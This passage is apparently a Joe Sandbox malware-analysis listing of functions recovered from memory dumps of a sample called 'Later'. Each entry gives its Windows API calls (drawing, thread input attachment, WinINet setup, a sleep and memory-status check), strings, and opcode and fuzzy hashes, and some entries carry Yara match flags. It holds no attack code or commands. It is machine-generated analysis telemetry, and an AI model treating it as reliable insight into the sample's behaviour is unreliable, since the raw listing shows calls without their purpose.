Part of subcall function 00BF16CF: BeginPath.GDI32(?), ref: 00BF174F
Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C7C163
LineTo.GDI32(00000000,?,?), ref: 00C7C170
EndPath.GDI32(00000000), ref: 00C7C180
StrokePath.GDI32(00000000), ref: 00C7C18E

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 8892f20a1823fbdecfa5685f98b240008e736c9f700db9842a4dbf059f91bf36
Instruction ID: 21a7a25ef70cba511515174f41d635c1b94e660fc35cdc74ef2ae15065704a1d
Opcode Fuzzy Hash: 8892f20a1823fbdecfa5685f98b240008e736c9f700db9842a4dbf059f91bf36
Instruction Fuzzy Hash: DEF0E232001259BBDB132F54AC0DFCE3F99AF05321F144100FA14250E1C3790659DFA9

Function 00C4A835 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C4A852
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4A865
GetCurrentThreadId.KERNEL32 ref: 00C4A86C
AttachThreadInput.USER32(00000000), ref: 00C4A873

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: d7fad91d2992892e86e64de65c242411c57b91720e6ce6ccd82867f666ea5f36
Instruction ID: dbcc64471ad6d21d4388f064be76ac1eb5fa0537e7c049331b4f812996cad468
Opcode Fuzzy Hash: d7fad91d2992892e86e64de65c242411c57b91720e6ce6ccd82867f666ea5f36
Instruction Fuzzy Hash: ACE03932541228BAEB601BA29C0CFDB3F1CFF127A1F108020F919850A0D7718A55CBA4

Function 014FA9EB Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,014FA4E8,00000000,00000001,?,00000000,?,014F6768,00000000,00000000,00000000), ref: 014FAA02
GetLastError.KERNEL32(?,014FA4E8,00000000,00000001,?,00000000,?,014F6768,00000000,00000000,00000000,00000000,00000000,?,014F6D0B,?), ref: 014FAA0E

Part of subcall function 014FA9D4: CloseHandle.KERNEL32(FFFFFFFE,014FAA1E,?,014FA4E8,00000000,00000001,?,00000000,?,014F6768,00000000,00000000,00000000,00000000,00000000), ref: 014FA9E4

___initconout.LIBCMT ref: 014FAA1E

Part of subcall function 014FA996: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,014FA9C5,014FA4D5,00000000,?,014F6768,00000000,00000000,00000000,00000000), ref: 014FA9A9

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,014FA4E8,00000000,00000001,?,00000000,?,014F6768,00000000,00000000,00000000,00000000), ref: 014FAA33

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: bf26a5915efbe60c19b5cbe0fa15f557bbd26f3f89c5625ec123a8f12694b213
Instruction ID: 28b63bc61c43794de5b4fe7a5bb4d09ff9925774a866dd17b74d03771083f814
Opcode Fuzzy Hash: bf26a5915efbe60c19b5cbe0fa15f557bbd26f3f89c5625ec123a8f12694b213
Instruction Fuzzy Hash: 50F03736500515BFCF331FD5DC04D9A3F66FB092A1B164015FF6D9A224CB328824EB90

Function 014D8A8C Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,014D8A29,00000064), ref: 014D8AAF
LeaveCriticalSection.KERNEL32(0152B624,?,?,014D8A29,00000064,?,?,?,01402A3C,0152CE40,0142350F,940E2C7A,?,?), ref: 014D8AB9
WaitForSingleObjectEx.KERNEL32(?,00000000,?,014D8A29,00000064,?,?,?,01402A3C,0152CE40,0142350F,940E2C7A,?,?), ref: 014D8ACA
EnterCriticalSection.KERNEL32(0152B624,?,014D8A29,00000064,?,?,?,01402A3C,0152CE40,0142350F,940E2C7A,?,?), ref: 014D8AD1

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: dd09edbd48b300dd2e311aa729e53b82937562c02a769453622ee814031c95fc
Instruction ID: f8e499c1a4418a03dd7ee64d7741051599d0340a0e5f81f941af18362bf028e2
Opcode Fuzzy Hash: dd09edbd48b300dd2e311aa729e53b82937562c02a769453622ee814031c95fc
Instruction Fuzzy Hash: 96E01233541134BBDE321F91EC08AAD7F69FB0EB51F060015FA155E25486726904ABD5

Function 00BF25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BF260D
SetTextColor.GDI32(?,000000FF), ref: 00BF2617
SetBkMode.GDI32(?,00000001), ref: 00BF262C
GetStockObject.GDI32(00000005), ref: 00BF2634
GetWindowDC.USER32(?,00000000), ref: 00C2C0F4
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C2C101
GetPixel.GDI32(00000000,?,00000000), ref: 00C2C11A
GetPixel.GDI32(00000000,00000000,?), ref: 00C2C133
GetPixel.GDI32(00000000,?,?), ref: 00C2C153
ReleaseDC.USER32(?,00000000), ref: 00C2C15E

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 7ccdf3345e840e0356b512d4e338d6a8dda9249f455ad6e730f925b2231098ad
Instruction ID: 29c012375ed4deca08326232af70d9d0c34f604eacf30de80e3329da594228a1
Opcode Fuzzy Hash: 7ccdf3345e840e0356b512d4e338d6a8dda9249f455ad6e730f925b2231098ad
Instruction Fuzzy Hash: 25E06531500244AADB615F64BC4D7EC3B20EB15331F14836AFA79480E187714598DB15

Function 00C305A9 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C305A9
GetDC.USER32(00000000), ref: 00C305B3
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C305D3
ReleaseDC.USER32(?), ref: 00C305F4

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b1ab702428a5d26b699e219d1f5fe170dcede78e31130eb6c02275fbf5f2f0d9
Instruction ID: 70e872146dd062c6c8d38b8b0a9d32f16259cb96a5ef891e544463b1f76ef390
Opcode Fuzzy Hash: b1ab702428a5d26b699e219d1f5fe170dcede78e31130eb6c02275fbf5f2f0d9
Instruction Fuzzy Hash: 4CE01A76800204EFCB819F60D808BAE7BF1EF8C311F208059FD5AE7210DB3885559F54

Function 00C305BD Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C305BD
GetDC.USER32(00000000), ref: 00C305C7
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C305D3
ReleaseDC.USER32(?), ref: 00C305F4

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: d0d50257f10bd293e233a648cb9b0e80817bf9ed6d032b21b03840084a65d708
Instruction ID: 922a89b3a9e0cf0553f0164dda634cc40a10d718cc37e5cf97c38040100d8524
Opcode Fuzzy Hash: d0d50257f10bd293e233a648cb9b0e80817bf9ed6d032b21b03840084a65d708
Instruction Fuzzy Hash: A2E01A76800204AFCB819F60D8087AE7BF1AF8C311F208058FE59A7210DB3895558F54

Function 0143E050 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 493COMMON

Download Yara Rule

Strings

., xrefs: 0143E23C

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 16f7c4a667f7fa0de5bcd22846e0fbf40c866b3778cba6f6b03e3ee73a609ad9
Instruction ID: b8734e57c395ae7164dab56168c0d70e216d519757f5185e6853c42336c46000
Opcode Fuzzy Hash: 16f7c4a667f7fa0de5bcd22846e0fbf40c866b3778cba6f6b03e3ee73a609ad9
Instruction Fuzzy Hash: 1B02C371E026198BCF19CF69C4943EDBBB1AFD9310F19816BD555BB3A1D7708A41CB80

Function 014C4E76 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 014C4E7D

Part of subcall function 014C3A04: __EH_prolog3.LIBCMT ref: 014C3A0B
Part of subcall function 014C3A04: std::_Lockit::_Lockit.LIBCPMT ref: 014C3A15
Part of subcall function 014C3A04: std::_Lockit::~_Lockit.LIBCPMT ref: 014C3A86

_Find_elem.LIBCPMT ref: 014C508A

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 014C4EE5

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: 915480212d9ceb49a978790f57fbe7be5fe49fff5e383f64efb6b578b60e148d
Instruction ID: 4c67d82b1b8d7f619aa80f2cf73e0f0e814deddb7b231ee332086d1309b29852
Opcode Fuzzy Hash: 915480212d9ceb49a978790f57fbe7be5fe49fff5e383f64efb6b578b60e148d
Instruction Fuzzy Hash: 79C19D38E042898EEF62DFA8C5947EDBFB2AF51A10F58405FD4856F3A2CB316945CB50

Function 014CC67A Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 014CC684

Part of subcall function 014C90C2: __EH_prolog3.LIBCMT ref: 014C90C9
Part of subcall function 014C90C2: std::_Lockit::_Lockit.LIBCPMT ref: 014C90D3
Part of subcall function 014C90C2: std::_Lockit::~_Lockit.LIBCPMT ref: 014C9144

_Find_elem.LIBCPMT ref: 014CC8CF

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 014CC6FB

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: 0ce3849a576b8915580baff060837ddb166f891a62ecc58cbcba5740c41bc592
Instruction ID: 214b9dfd4d65b6626bdf25b05c806bd61d436330d898095ac63e6105a2cdfa3d
Opcode Fuzzy Hash: 0ce3849a576b8915580baff060837ddb166f891a62ecc58cbcba5740c41bc592
Instruction Fuzzy Hash: A7C1A438D042598EDF61DBA8C8C47EDBBB2BF15A14F44409FD48D6B3A2DB359885CB60

Function 014CCA57 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 014CCA61

Part of subcall function 014C02D0: std::_Lockit::_Lockit.LIBCPMT ref: 014C0323
Part of subcall function 014C02D0: std::_Lockit::_Lockit.LIBCPMT ref: 014C0345
Part of subcall function 014C02D0: std::_Lockit::~_Lockit.LIBCPMT ref: 014C0365
Part of subcall function 014C02D0: std::_Lockit::~_Lockit.LIBCPMT ref: 014C0555

_Find_elem.LIBCPMT ref: 014CCCAC

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 014CCAD8

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 3042121994-2799312399
Opcode ID: a261dc7f2d13f94d49ec2715369976c64b14e7697593137a4e285fe77d96b875
Instruction ID: ad38af28870b32ce331d32cd4e5b1168bb09cfebb67483077823630e1f917ae0
Opcode Fuzzy Hash: a261dc7f2d13f94d49ec2715369976c64b14e7697593137a4e285fe77d96b875
Instruction Fuzzy Hash: FCC19138D042598EDF61DBA8C8C47ADBFB2BF15A14F44409FD84D6B3A2DB359886CB50

Function 00C0278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00C049C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C027AF,?,00000001), ref: 00C049F4

_free.LIBCMT ref: 00C3FA84
_free.LIBCMT ref: 00C3FACB

Part of subcall function 00C029BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C02ADF

Strings

Bad directive syntax error, xrefs: 00C3FAB3

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 1013bf2d20732e9a2a2d4d32c14011cfceba0ed4119d5fa6d406a2d346f7761f
Instruction ID: 1ffcb8ff423c1f2ee8a4fab1abaf02b82ab8086ba5d4d9bfd065ec30f322d322
Opcode Fuzzy Hash: 1013bf2d20732e9a2a2d4d32c14011cfceba0ed4119d5fa6d406a2d346f7761f
Instruction Fuzzy Hash: EB917F71D10259AFCF18EFA4D8919EEB7B4FF05304F14486EF815AB291DB309A46EB50

Function 014288F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 01428A6B

Strings

http, xrefs: 014289D4, 01428A37
Google Chrome, xrefs: 01401BE3

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: Google Chrome$http
API String ID: 118556049-548362223
Opcode ID: fe6268964bbe4206132ae1d52ff37321efd739eb39ef97f96c6675a2de3bee55
Instruction ID: 56041b6847913fd1275faa8d573a202562e2026f24c73368667d1a71ec65a2e0
Opcode Fuzzy Hash: fe6268964bbe4206132ae1d52ff37321efd739eb39ef97f96c6675a2de3bee55
Instruction Fuzzy Hash: 5A412872A0012A9FDF05DF6DCC905AFBBA5FF54250B54026EE811E7325EB30EE518B91

Function 014BA1F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 014BA35F

Part of subcall function 014DA47E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,014C34BB,?,01524438,?), ref: 014DA4DE

Strings

ios_base::failbit set, xrefs: 014BA205
ios_base::badbit set, xrefs: 014BA2F7, 014BA318, 014BA343

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 53e56a5aa6de70a3588e6e5ad917eb3f0ffc256d0cbc1391fabe6729a6c1bb4e
Instruction ID: f9f3af66b48dcc4db424796ca9727644693eaf36bbfd5da1bfc215c141e93c46
Opcode Fuzzy Hash: 53e56a5aa6de70a3588e6e5ad917eb3f0ffc256d0cbc1391fabe6729a6c1bb4e
Instruction Fuzzy Hash: 1941E771900219AFD704DF59C884BDEBBF8FF55620F24852EE51497790D771A944CBA0

Function 00BFE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00BFE01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 00BFE037

Strings

@, xrefs: 00BFE02B

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 90ae76f519b246c3d096dd96b108abe906a467ce7f40fe71541a68c350480f77
Instruction ID: 6e358ccabcc37c146722301aaba5b0610258bc5481b296040dbfa4baefcec951
Opcode Fuzzy Hash: 90ae76f519b246c3d096dd96b108abe906a467ce7f40fe71541a68c350480f77
Instruction Fuzzy Hash: 9C5139714087489BE320AF50E886BAFB7F8FB84714F41489DF2D8421A5DB71992DCB5A

Function 00C62A3E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C62A4E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C62A84

Strings

|, xrefs: 00C62A55

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: a2e10ec0de341cd926b6f949c3e56d0d297fb145b2733f518803dc5064610b9a
Instruction ID: ace2ac9a8e0ff2a18bf28182c4e34c33610d92e89f2290188621d5fffa8e1410
Opcode Fuzzy Hash: a2e10ec0de341cd926b6f949c3e56d0d297fb145b2733f518803dc5064610b9a
Instruction Fuzzy Hash: 09311A71C00219ABCF11EFA1CC85AEEBFB9FF08314F144059FD15A6166EB315A56EB60

Function 00C76AC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C76B4E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C76B59

Strings

Combobox, xrefs: 00C76B1B

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 16abb06d1d32cd80e7197739ae17ba971b588fc5239010421ff15db34bdfa4e1
Instruction ID: 8ffacee40d2ab0ab3146b973a21c6b1ab3947f4699b17ed0e28812c2235c910a
Opcode Fuzzy Hash: 16abb06d1d32cd80e7197739ae17ba971b588fc5239010421ff15db34bdfa4e1
Instruction Fuzzy Hash: 6611B2713006086FEF119F64CC91FFB37AAEB893A4F208125F928E7290D7719D51A760

Function 014022A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 014022CB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0140231A

Strings

bad locale name, xrefs: 01402336

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: ce0631df93b46be80211cd042c44b2e4d50344d95f26cfff29cc0c5112f5638f
Instruction ID: 5c12f4f726e26a1ea59ce12f6cddcba2c794c19218db3b19466309efb0e0f896
Opcode Fuzzy Hash: ce0631df93b46be80211cd042c44b2e4d50344d95f26cfff29cc0c5112f5638f
Instruction Fuzzy Hash: 27119E71904B449FD321CF69C900B47BBE8FB29A10F008A2EE499C7B80D7B5A504CB95

Function 00C62686 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00C61E13,?,?,?), ref: 00C626DC
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C62705

Strings

<local>, xrefs: 00C626CD

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: ee4a73987f2a0ae6d482990c5b2134952df92ff1e83eb0fd2a522c46fec6733e
Instruction ID: 0555c43e5989b0f9a434ff88965f5aa4c59b2cf06dc4066d15ccdc4f7bc8c616
Opcode Fuzzy Hash: ee4a73987f2a0ae6d482990c5b2134952df92ff1e83eb0fd2a522c46fec6733e
Instruction Fuzzy Hash: A311E0B0541A25BADB348F52CCC9EBBFBA8FF02391F10812AF91546000D270AA94CBF0

Function 00C6823D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

